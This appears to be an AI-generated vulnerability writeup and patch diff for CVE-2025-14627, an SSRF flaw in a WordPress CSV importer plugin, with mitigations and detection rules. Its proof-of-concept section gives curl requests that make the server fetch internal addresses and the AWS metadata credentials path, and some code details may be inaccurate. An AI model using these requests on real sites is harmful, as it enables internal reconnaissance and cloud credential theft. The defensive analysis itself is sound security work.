What is CVE-2025-14627?

CVE-2025-14627 is a security vulnerability identified in Folder Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-14627?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-14627.

How can I protect against CVE-2025-14627?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-14627.

REPORT / 01

Analysis Report · Folder Analysis cache/wp-ultimate-csv-importer_7.35 → cache/wp-ultimate-csv-importer_7.36 — CVE-2025-14627

Shared security patch analysis results

mode patchdiff ai claude_cli haiku

02 · Lifecycle actions cancel · resume · skip · regenerate

03 · Share this analysis copy link · embed report

03 · CVE Security Analysis & Writeups ai-generated · per cve

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-14627 NVD

AI-Generated Analysis

# Server-Side Request Forgery in WP Import Ultimate CSV XML Importer - CVE-2025-14627

## 1. Vulnerability Background

### What is this vulnerability?

CVE-2025-14627 is a **Server-Side Request Forgery (SSRF)** vulnerability in the WP Import – Ultimate CSV XML Importer plugin for WordPress (versions ≤ 7.35). SSRF vulnerabilities allow attackers to force the server to make HTTP requests to unintended destinations, bypassing network security controls and access restrictions.

In this specific case, the vulnerability exists in the `upload_function()` method within `uploadModules/UrlUpload.php`. The plugin processes user-supplied URLs for CSV/XML file imports without adequately validating the final destination after following URL shortener redirects (specifically Bitly links). This allows authenticated attackers to probe and interact with internal network resources that should be inaccessible from the internet-facing application.

### Why is it Critical?

This vulnerability has severe security implications:

1. **Information Disclosure**: Attackers can access sensitive internal endpoints (localhost services, metadata services) that expose:
   - Database connection details
   - API credentials
   - Environment variables
   - Configuration data
   - Private cloud metadata (AWS EC2 role credentials via `169.254.169.254`)

2. **Port Scanning**: Attackers can perform internal network reconnaissance to map services and identify vulnerable systems on the internal network

3. **Lateral Movement**: Compromised credentials or data can facilitate attacks against other internal systems

4. **Denial of Service**: Attackers can generate excessive requests to internal services, potentially causing DoS

5. **Authentication Bypass**: Internal services that trust requests from localhost can be accessed without authentication

### Affected Systems

- **Plugin**: WP Import – Ultimate CSV XML Importer
- **Versions**: All versions up to and including 7.35
- **Privilege Level Required**: Contributor-level access or higher (authenticated user)
- **WordPress Versions**: Any version with this plugin installed

---

## 2. Technical Details

### Root Cause Analysis

The vulnerability stems from **incomplete URL validation** in a multi-step URL processing workflow:

1. **Initial Validation (Insufficient)**: The code calls `wp_http_validate_url()` which performs basic URL syntax validation but **does not restrict access to private IP ranges or reserved addresses**.

2. **URL Shortener Resolution (Unvalidated)**: When a Bitly shortlink is detected, the `unshorten_bitly_url()` function automatically follows HTTP redirects to resolve the shortened URL to its final destination.

3. **Missing Re-validation**: The **critical flaw**: After following the redirect, the resolved URL is **never re-validated**. An attacker can craft a Bitly shortlink that initially points to a public URL (bypassing the first validation), but redirects to an internal IP address (localhost, private ranges, or metadata services).

4. **No IP Range Filtering**: Even the initial `wp_http_validate_url()` function doesn't check IP ranges; it only validates syntax and scheme.

### Old Code vs. New Code

#### **Vulnerable Code (Lines 60-72, 87-111)**

```php
// Line 60-72: Initial validation without IP checks
check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
$file_url = esc_url_raw($_POST['url']);
$file_url = wp_http_validate_url($file_url);  // ← Only syntax validation
$media_type = '';
...

// Line 87-111: Bitly resolution without re-validation
if(strstr($file_url, 'https://bit.ly/')){
    $file_url = $this->unshorten_bitly_url($file_url);  // ← Follows redirects
    // ← No re-validation happens here!
}

// URL is now used without checking if it points to internal resources
$response = wp_remote_get($file_url);
```

**Vulnerability Summary**:
- ✗ Initial URL validated (syntax only, no IP checks)
- ✗ Bitly redirects followed without constraint
- ✗ Resolved URL never re-validated
- ✗ No IP range filtering (private, reserved, metadata)

#### **Patched Code**

```php
// Pre-validation with IP range checking
check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
$file_url = esc_url_raw($_POST['url']);
$file_url = wp_http_validate_url($file_url);

// NEW: Extract and validate initial URL's IP
$host = wp_parse_url($file_url, PHP_URL_HOST);
$ip   = gethostbyname($host);

if (!filter_var(
    $ip,
    FILTER_VALIDATE_IP,
    FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
)) {
    $response['success'] = false;
    $response['message'] = 'Download Failed. Invalid or restricted URL destination.';
    echo wp_json_encode($response);
    die();  // ← Block private IP ranges immediately
}

...

// NEW: Re-validate after Bitly resolution
if (strstr($file_url, 'https://bit.ly/')) {
    $file_url = $this->unshorten_bitly_url($file_url);
    
    // ✓ Re-validate syntax
    $file_url = wp_http_validate_url($file_url);
    if (!$file_url) {
        $response['success'] = false;
        $response['message'] = 'Download Failed. Resolved URL is not valid.';
        echo wp_json_encode($response);
        die();
    }
    
    // ✓ Re-validate IP ranges (critical fix)
    $host = wp_parse_url($file_url, PHP_URL_HOST);
    $ip   = gethostbyname($host);
    if (!filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    )) {
        $response['success'] = false;
        $response['message'] = 'Download Failed. Invalid or restricted URL destination.';
        echo wp_json_encode($response);
        die();  // ← Block internal resources after redirect
    }
}
```

**Security Improvements**:
- ✓ IP range validation using `filter_var()` with flags
- ✓ Blocks private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
- ✓ Blocks reserved ranges (127.0.0.0/8, 169.254.0.0/16, 0.0.0.0/8)
- ✓ Re-validates after shortlink resolution
- ✓ Defense in depth with multiple validation checkpoints

### How These Changes Fix the Vulnerability

1. **IP Range Filtering**: The `FILTER_FLAG_NO_PRIV_RANGE` flag blocks:
   - `10.0.0.0/8` (private networks)
   - `172.16.0.0/12` (private networks)
   - `192.168.0.0/16` (private networks)
   - `127.0.0.0/8` (localhost)

2. **Metadata Service Protection**: The `FILTER_FLAG_NO_RES_RANGE` flag blocks:
   - `169.254.0.0/16` (link-local, including AWS metadata `169.254.169.254`)
   - `0.0.0.0/8` (broadcast/reserved)
   - `224.0.0.0/4` (multicast)

3. **Post-Redirect Validation**: By re-validating after the Bitly shortlink is resolved, attackers cannot chain:
   - Public URL (passes initial validation)
   - → Bitly shortlink redirect
   - → Internal IP (would now be caught)

---

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation

1. **WordPress Installation** with WP Import – Ultimate CSV XML Importer plugin (version ≤ 7.35) active
2. **Contributor-level Account** or higher (Editor, Admin roles also work)
3. **Bitly API Access** or ability to craft shortened URLs that redirect to internal endpoints
4. **Network Access** to the WordPress installation
5. **Target Internal Endpoints** to probe (localhost, private IPs, metadata services)

### Step-by-Step Exploitation

#### **Attack Vector 1: Direct Internal IP Access**

```bash
# Assume WordPress is at: https://vulnerable-site.com/wp-admin/

# Attacker logs in as Contributor and crafts a malicious request
curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=smack_url_upload&url=http://127.0.0.1:8080/admin&securekey=[valid_nonce]"

# In vulnerable version:
# 1. URL http://127.0.0.1:8080/admin is validated (syntax passes)
# 2. Server makes request to localhost:8080
# 3. Attacker receives response from internal admin panel
```

#### **Attack Vector 2: URL Shortener Bypass (Bitly)**

```bash
# Attacker creates a Bitly shortlink that redirects to internal service:
# Step 1: Create bit.ly link that redirects to: http://192.168.1.1/admin/settings
# Example: https://bit.ly/attacker_controlled (→ http://192.168.1.1/admin/settings)

# Step 2: Submit to vulnerable plugin
curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=smack_url_upload&url=https://bit.ly/attacker_controlled&securekey=[valid_nonce]"

# Vulnerable behavior:
# 1. Initial validation: https://bit.ly/... (public domain, PASSES)
# 2. unshorten_bitly_url() follows redirect → http://192.168.1.1/admin/settings
# 3. No re-validation occurs
# 4. Server fetches from internal IP
```

#### **Attack Vector 3: AWS/Cloud Metadata Access**

```bash
# Attacker creates Bitly shortlink: https://bit.ly/metadata_grab
# This redirects to: http://169.254.169.254/latest/meta-data/iam/security-credentials/

curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=smack_url_upload&url=https://bit.ly/metadata_grab&securekey=[valid_nonce]"

# Vulnerable result:
# Server makes request to AWS metadata service
# Response contains: IAM role name, temporary credentials, etc.
# Attacker gains AWS credentials for lateral movement
```

### Expected Behavior vs. Exploited Behavior

#### **Legitimate Use (Expected)**
```
User wants to import CSV from: https://example.com/data.csv
↓
WordPress validates: https://example.com (public, safe domain)
↓
Downloads CSV successfully
↓
Import proceeds normally
```

#### **Exploited Behavior (Vulnerable)**
```
Attacker submits: https://bit.ly/shortlink (publicly visible)
↓
Plugin validates: https://bit.ly (public Bitly domain, PASSES)
↓
Plugin follows Bitly redirect → http://127.0.0.1:3306 (MySQL port)
↓
NO RE-VALIDATION (vulnerability!)
↓
Server connects to localhost MySQL, exposing version/info
↓
Attacker gains internal infrastructure intelligence
```

### How to Verify the Vulnerability Exists

#### **Method 1: Direct Network Testing**

```bash
# 1. Log into WordPress as Contributor
# 2. Capture the nonce from a page that uses the plugin
# 3. Test with a simple localhost URL

curl -X POST https://target-wordpress.com/wp-admin/admin-ajax.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=smack_url_upload&url=http://127.0.0.1:8000&securekey=[NONCE]"

# If vulnerable: Server attempts to connect, returns error (connection refused) or data
# If patched: Returns "Invalid or restricted URL destination"
```

#### **Method 2: Metadata Service Probe**

```bash
# On AWS EC2 instance or container with plugin
curl -X POST http://localhost/wp-admin/admin-ajax.php \
  -d "action=smack_url_upload&url=http://169.254.169.254/latest/meta-data/&securekey=[NONCE]"

# Vulnerable: Returns metadata information
# Patched: Returns validation error
```

#### **Method 3: Plugin Behavior Analysis**

Check `uploadModules/UrlUpload.php`:
- Look for `unshorten_bitly_url()` call
- Search for re-validation after shortlink resolution
- If no `wp_http_validate_url()` or `filter_var()` with IP flags after Bitly handling → **VULNERABLE**

---

## 4. Recommendations

### Mitigation Strategies

#### **Immediate Actions (Until Patch Applied)**

1. **Disable the Plugin**
   ```bash
   # Deactivate via wp-cli
   wp plugin deactivate wp-import-ultimate-csv-xml-importer --allow-root
   ```

2. **Restrict User Roles**
   ```php
   // In wp-config.php or custom plugin:
   // Only allow administrators to upload
   add_filter('smack_url_upload_capability', function() {
       return 'manage_options';  // Admin only
   });
   ```

3. **Network-Level Mitigation**
   - Block outbound requests from WordPress server to private IPs at firewall level
   - Implement egress filtering to prevent requests to `10.0.0.0/8`, `192.168.0.0/16`, `127.0.0.0/8`, `169.254.0.0/16`
   - Use WAF rules to block AJAX calls to `admin-ajax.php?action=smack_url_upload`

#### **Long-term Solutions**

1. **Update to Patched Version**
   ```bash
   wp plugin update wp-import-ultimate-csv-xml-importer --allow-root
   ```

2. **Implement Custom IP Validation**
   ```php
   // Add to functions.php
   add_filter('wp_http_validate_url', 'security_validate_url');
   
   function security_validate_url($url) {
       $parsed = wp_parse_url($url);
       $host = isset($parsed['host']) ? $parsed['host'] : null;
       
       if (!$host) return false;
       
       $ip = gethostbyname($host);
       
       // Block private ranges
       if (!filter_var($ip, FILTER_VALIDATE_IP, 
           FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
           return false;
       }
       
       return $url;
   }
   ```

3. **Disable URL Shortener Support**
   - Fork/patch the plugin to remove Bitly resolution
   - Or patch the plugin locally before updating

### Detection Methods

#### **Web Application Firewall (WAF) Rules**

```
# Alert on smack_url_upload with private IP patterns
if (request.path contains "admin-ajax.php" AND 
    request.body contains "action=smack_url_upload" AND 
    (request.body contains "127.0.0.1" OR 
     request.body contains "192.168" OR 
     request.body contains "10.0" OR 
     request.body contains "169.254")) {
    alert("Potential SSRF attempt detected");
}
```

#### **Log Monitoring**

```bash
# Monitor WordPress debug logs for failed URL validations
grep "Download Failed" /var/www/html/wp-content/debug.log

# Monitor outbound connections from WordPress
tcpdump -i any "src [wordpress-ip] and (dst net 10.0.0.0/8 or dst net 192.168.0.0/16 or dst 127.0.0.1)"
```

#### **Intrusion Detection**

```
# Suricata/Snort rule
alert http $HOME_NET any -> any any (
    msg:"WP Import SSRF attempt - CVE-2025-14627";
    content:"POST"; http_method;
    content:"admin-ajax.php"; http_uri;
    content:"action=smack_url_upload"; http_client_body;
    pcre:"/169\.254\.|127\.0\.0\.|192\.168\.|10\./";
    classtype:attempted-admin;
    sid:1000001;
)
```

#### **Database Audit Logs**

Monitor for unusual activity from WordPress database user:
- Multiple failed connection attempts
- Access to `wp_options` table (where credentials might be stored)
- Unusual query patterns after plugin updates

### Best Practices to Prevent Similar Issues

#### **For Plugin Developers**

1. **Always Re-validate After Redirects**
   ```php
   // ✓ Correct pattern
   $url = wp_http_validate_url($initial_url);
   if (!$url) return error();
   
   $response = wp_remote_get($url, ['follow_redirects' => true]);
   
   // Must re-validate the final URL after following redirects
   $final_url = $response['redirect_url'] ?? $initial_url;
   if (!wp_http_validate_url($final_url)) {
       return error("Redirect to invalid URL");
   }
   ```

2. **Implement Whitelist-Based Approach**
   ```php
   // Better than blacklisting
   $allowed_domains = ['example.com', 'cdn.example.com', 'api.example.com'];
   
   $url_host = wp_parse_url($url, PHP_URL_HOST);
   if (!in_array($url_host, $allowed_domains)) {
       return error("URL not on whitelist");
   }
   ```

3. **Use URL Shortener APIs Securely**
   ```php
   // Instead of following redirects in-app, validate via API
   function unshorten_bitly_url_safely($short_url) {
       // Use Bitly API with proper validation
       $api_response = wp_remote_get('https://api-ssl.bitly.com/v3/expand?shortUrl=' . $short_url);
       
       if (is_wp_error($api_response)) {
           return false;
       }
       
       $data = json_decode(wp_remote_retrieve_body($api_response));
       $expanded_url = $data->data->expand[0]->long_url ?? null;
       
       // Validate the expanded URL
       return wp_http_validate_url($expanded_url);
   }
   ```

4. **Use WordPress Remote Request Helpers Safely**
   ```php
   // Use wp_safe_remote_get() instead of custom implementations
   $args = [
       'sslverify' => true,
       'timeout' => 10,
       'user-agent' => 'WordPress/' . $GLOBALS['wp_version'],
   ];
   
   $response = wp_safe_remote_get($file_url, $args);
   ```

#### **For System Administrators**

1. **Network Segmentation**
   - Isolate WordPress servers from internal infrastructure
   - Use security groups/firewall rules to prevent outbound access to private IPs
   - Implement proxy servers for legitimate external requests

2. **Principle of Least Privilege**
   - Don't grant Contributor role to untrusted users
   - Use capability checks to restrict plugin features
   - Audit user role assignments regularly

3. **Security Headers & CSP**
   ```apache
   # In .htaccess or server config
   Header set X-Content-Type-Options "nosniff"
   Header set X-Frame-Options "SAMEORIGIN"
   Header set Content-Security-Policy "default-src 'self'"
   ```

4. **Regular Audits**
   - Review installed plugins for similar SSRF patterns
   - Check for unvalidated user input in file operations
   - Test egress filtering rules periodically

#### **For WordPress Site Owners**

1. **Keep Everything Updated**
   ```bash
   # Automatic updates
   wp plugin update-all --allow-root
   wp theme update-all --allow-root
   wp core update --allow-root
   ```

2. **Limit Plugin Functionality**
   - Disable URL import features if not needed
   - Use security plugins (Wordfence, Sucuri) to monitor plugin behavior

3. **Monitor Access Logs**
   ```bash
   # Check for suspicious admin-ajax requests
   tail -f /var/log/apache2/access.log | grep "admin-ajax"
   ```

4. **Use Web Application Firewall**
   - Cloudflare, Sucuri, or AWS WAF rules
   - Block requests with suspicious patterns
   - Rate-limit AJAX endpoints

---

## Summary

CVE-2025-14627 demonstrates a critical SSRF vulnerability resulting from **incomplete URL validation in multi-step operations**. The root cause was the plugin's failure to re-validate URLs after following redirects from URL shorteners. The fix implements defense-in-depth through:

1. Pre-validation IP range checks
2. Re-validation after shortlink resolution  
3. Blocking private and reserved IP ranges
4. Proper error handling and user feedback

Organizations using affected versions should immediately update to the patched version and implement the mitigation strategies outlined above.

05 · Findings filter · search · paginate

Showing 0 to 0 of 0 results

uploadModules/UrlUpload.php AI: 1 vulnerabilities 1 true positive CVE-2025-14627

--- cache/wp-ultimate-csv-importer_7.35/uploadModules/UrlUpload.php	2026-01-03 00:35:25.666624232 +0000+++ cache/wp-ultimate-csv-importer_7.36/uploadModules/UrlUpload.php	2026-01-03 00:36:09.813355538 +0000@@ -57,6 +57,20 @@ 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey'); 		$file_url = esc_url_raw($_POST['url']); 		$file_url = wp_http_validate_url($file_url);+$host = wp_parse_url($file_url, PHP_URL_HOST);+$ip   = gethostbyname($host);++if (!filter_var(+    $ip,+    FILTER_VALIDATE_IP,+    FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE+)) {+    $response['success'] = false;+    $response['message'] = 'Download Failed. Invalid or restricted URL destination.';+    echo wp_json_encode($response);+    die();+}+ 		$media_type = '';         if (isset($_POST['MediaType'])) {             $media_type = sanitize_key($_POST['MediaType']);@@ -70,9 +84,33 @@ 		$response = []; 		global $wpdb; 		$file_table_name = $wpdb->prefix ."smackcsv_file_events";			-			if(strstr($file_url, 'https://bit.ly/')){-				$file_url = $this->unshorten_bitly_url($file_url);-			}+			if (strstr($file_url, 'https://bit.ly/')) {++    $file_url = $this->unshorten_bitly_url($file_url);++    $file_url = wp_http_validate_url($file_url);+    if (!$file_url) {+        $response['success'] = false;+        $response['message'] = 'Download Failed. Resolved URL is not valid.';+        echo wp_json_encode($response);+        die();+    }++    $host = wp_parse_url($file_url, PHP_URL_HOST);+    $ip   = gethostbyname($host);++    if (!filter_var(+        $ip,+        FILTER_VALIDATE_IP,+        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE+    )) {+        $response['success'] = false;+        $response['message'] = 'Download Failed. Invalid or restricted URL destination.';+        echo wp_json_encode($response);+        die();+    }+}+  			$pub = substr($file_url, strrpos($file_url, '/') + 1);                /*Added support for google addon & dropbox*/

AI Analysis

Vulnerability Existed: yes
TRUE POSITIVE
[CWE Name] Server-Side Request Forgery (SSRF) - [CWE ID] CWE-918 - [File] uploadModules/UrlUpload.php [Lines 60-72, 87-111]

[Old Code]
```php
check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
$file_url = esc_url_raw($_POST['url']);
$file_url = wp_http_validate_url($file_url);
$media_type = '';
...
if(strstr($file_url, 'https://bit.ly/')){
    $file_url = $this->unshorten_bitly_url($file_url);
}
```

[Fixed Code]
```php
check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
$file_url = esc_url_raw($_POST['url']);
$file_url = wp_http_validate_url($file_url);
$host = wp_parse_url($file_url, PHP_URL_HOST);
$ip   = gethostbyname($host);

if (!filter_var(
    $ip,
    FILTER_VALIDATE_IP,
    FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
)) {
    $response['success'] = false;
    $response['message'] = 'Download Failed. Invalid or restricted URL destination.';
    echo wp_json_encode($response);
    die();
}
...
if (strstr($file_url, 'https://bit.ly/')) {
    $file_url = $this->unshorten_bitly_url($file_url);
    $file_url = wp_http_validate_url($file_url);
    if (!$file_url) {
        $response['success'] = false;
        $response['message'] = 'Download Failed. Resolved URL is not valid.';
        echo wp_json_encode($response);
        die();
    }
    $host = wp_parse_url($file_url, PHP_URL_HOST);
    $ip   = gethostbyname($host);
    if (!filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    )) {
        $response['success'] = false;
        $response['message'] = 'Download Failed. Invalid or restricted URL destination.';
        echo wp_json_encode($response);
        die();
    }
}
```

Explanation:
The original code was vulnerable to SSRF attacks. While `wp_http_validate_url()` performs basic URL validation, it does not restrict access to private IP ranges or reserved addresses. An attacker could craft URLs pointing to internal infrastructure (e.g., `http://127.0.0.1`, `http://192.168.x.x`, `http://10.x.x.x`) or metadata services (e.g., AWS EC2 metadata endpoints at `http://169.254.169.254`). The fix adds IP validation using `filter_var()` with `FILTER_FLAG_NO_PRIV_RANGE` and `FILTER_FLAG_NO_RES_RANGE` flags to block requests to private and reserved IP address ranges. Additionally, after URL shortener resolution (bit.ly), the code now re-validates the resolved URL and re-checks the IP, preventing attackers from using URL shorteners to bypass the initial SSRF protection.

CVE Analysis Results:

CVE-2025-14627: Yes

View CVE Description

The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.35. This is due to inadequate validation of the resolved URL after following Bitly shortlink redirects in the `upload_function()` method. While the initial URL is validated using `wp_http_validate_url()`, when a Bitly shortlink is detected, the `unshorten_bitly_url()` function follows redirects to the final destination URL without re-validating it. This makes it possible for authenticated attackers with Contributor-level access or higher to make the server perform HTTP requests to arbitrary internal endpoints, including localhost, private IP ranges, and cloud metadata services (e.g., 169.254.169.254), potentially exposing sensitive internal data.

Showing 1 to 1 of 1 results